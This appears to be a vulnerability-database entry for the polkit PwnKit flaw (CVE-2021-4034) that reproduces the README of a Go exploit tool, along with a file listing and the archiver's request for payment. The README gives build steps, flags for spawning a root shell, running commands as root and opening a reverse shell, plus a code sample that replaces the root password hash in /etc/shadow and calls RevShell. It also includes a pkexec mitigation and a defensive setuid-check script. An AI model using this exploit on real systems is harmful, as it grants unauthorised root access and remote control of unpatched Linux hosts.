Related vulnerability
Title:
polkit buffer error vulnerability
(CVE-2021-4034)
Description: polkit is a component that controls system-wide privileges on Unix-like operating systems. By defining and auditing permission rules, it mediates communication between processes of different privilege levels. polkit's pkexec application contains a buffer error vulnerability: an attacker can exploit it by crafting environment variables that cause pkexec to execute arbitrary code. On a successful attack, an unprivileged user on the target machine gains administrative rights, so the flaw can lead to local privilege escalation.
Description
Go implementation of the PwnKit Linux Local Privilege Escalation exploit (CVE-2021-4034)
Introduction
# ez-pwnkit
A pure-Go implementation of the **CVE-2021-4034 PwnKit** exploit.
The exploit uses `syscall.ForkExec` so that the spawned process survives the end of the main program.
## Installation
```bash
git clone https://github.com/OXDBXKXO/ez-pwnkit.git
cd ez-pwnkit
make
```
As the exploit relies on a malicious shared library, a **PWN.so** file is generated from ***payload.go*** and embedded in the resulting `exploit` executable.
The ***Makefile*** uses `sed` to temporarily change the package name of the ***payload.go*** file to `main`, hence making this ***Makefile*** Linux-only.
As the Go payload is not as reliable as the C one, the ***Makefile*** will compile the exploit with the C payload by default. You can choose to compile with the Go payload using `make build_go`.
## Usage
#### As standalone executable
```
$> ./exploit -h
Usage of ./exploit:
  -c string
        Run command as root in separate process
  -o    Pipe output of forked command to terminal
  -r string
        Open a reverse-shell in separate process. Format: ip:port
  -s    Spawn a root shell
```
The exploit can either be used with a command (`-c`), as a reverse-shell (`-r`) or spawn a root shell (`-s`).
```bash
$> ./exploit -s
sh-5.1#
```
```bash
$> ./exploit -c "cat /etc/passwd"
```
```bash
$> ./exploit -o -c "cat /etc/passwd"
[/etc/passwd content]
```
#### As package
```go
package main

import (
	"github.com/OXDBXKXO/ez-pwnkit"
)

func main() {
	// Change root password to 'password'
	ez_pwnkit.Command(`sed -i -e 's,^root:[^:]\+:,root:$6$eymNRCK.KxwDM6vu$idH0swGW1nsnLb8fT1QibUho5xg7uGJT7fuiheLZHIi9M4gTSk0qIOlUIk2Mm9/Nz5C.T4GkgkmLcK5BtOPkS0:,' etc/shadow`, false)
	// Open a reverse-shell
	ez_pwnkit.RevShell("127.0.0.1:1337")
}
```
Note that, because `Command` and `RevShell` use `syscall.ForkExec` to run the exploit, the resulting processes are separate from the main program and survive its end.
Although **go-PwnKit** can be imported into your project from GitHub, do not forget that you will execute an untrusted shared library as root. Using a locally compiled `PWN.so` is hence highly recommended. Just sayin' 😚
## Demonstration
```bash
$> ./exploit
sh-5.1# id
uid=0(root) gid=0(root) groups=0(root)
sh-5.1#
```
## Mitigation
Patch `pkexec` if possible, otherwise disable the ***setuid*** bit on the `pkexec` binary.
```bash
chmod 0755 /usr/bin/pkexec
```
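To verify that the mitigation above is actually in place on a host, the following added shell snippet (not part of the ez-pwnkit project) checks whether a `pkexec` binary still carries the setuid bit. The path argument and the `report_pkexec` helper are assumptions introduced here so the check can be pointed at any file, including a throwaway test file.

```shell
# Added example, not code from the ez-pwnkit project: report whether a
# pkexec binary still has the setuid bit that the README's mitigation clears.
# The path argument defaults to /usr/bin/pkexec but can be any file.

# Returns 0 (true) when the file at $1 has the setuid bit set, 1 otherwise.
pkexec_is_setuid() {
    [ -u "$1" ]
}

# Returns 0 when the mitigation is in place (binary absent or not setuid),
# 1 when the setuid bit is still present.
pkexec_mitigated() {
    if [ ! -e "$1" ]; then
        # No pkexec on this host: nothing for the exploit to target.
        return 0
    fi
    if pkexec_is_setuid "$1"; then
        return 1
    fi
    return 0
}

# Print a one-line status (octal mode plus verdict) for the given path.
report_pkexec() {
    path="${1:-/usr/bin/pkexec}"
    if [ ! -e "$path" ]; then
        echo "$path: not present"
        return 0
    fi
    mode=$(stat -c '%a' "$path")   # e.g. 4755 while setuid is set
    if pkexec_mitigated "$path"; then
        echo "$path: mode $mode, setuid bit cleared (mitigated)"
    else
        echo "$path: mode $mode, setuid bit SET; patch polkit or run: chmod 0755 $path"
    fi
}

report_pkexec "$@"
```

Run it without arguments on a host to inspect the real `/usr/bin/pkexec`; a mode of `4755` means the binary is still setuid and an unpatched polkit remains exploitable, while `755` matches the `chmod` mitigation shown above. Clearing the bit is a stopgap: it also breaks legitimate `pkexec` use, so updating polkit is the preferred fix.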
## Credits
This project is inspired by several other PoCs of the **PwnKit** exploit.
Thanks to [An00bRektn](https://github.com/An00bRektn/CVE-2021-4034) for the straight-forward exploit setup.
Thanks to [PeterGottesman](https://github.com/PeterGottesman/pwnkit-exploit) and [berdav](https://github.com/berdav/CVE-2021-4034) for the clarity of the exploit explanation.
Thanks to [dzonerzy](https://github.com/dzonerzy/poc-cve-2021-4034) for the *GIO_USE_VFS* trick.
File snapshot
[4.0K] /data/pocs/5854b7975a1829b395dae7334cfbe78add4f3567
├── [4.0K] cmd
│ └── [ 652] main.go
├── [3.5K] exploit.go
├── [ 46] go.mod
├── [4.0K] internal
│ ├── [ 359] Makefile
│ ├── [3.0K] payload.c
│ ├── [2.0K] payload.go
│ └── [ 22K] PWN.so
├── [ 404] Makefile
└── [2.8K] README.md
2 directories, 9 files
Notes
1. Accessing the original source is recommended first.
2. If the source has been removed or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of this PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.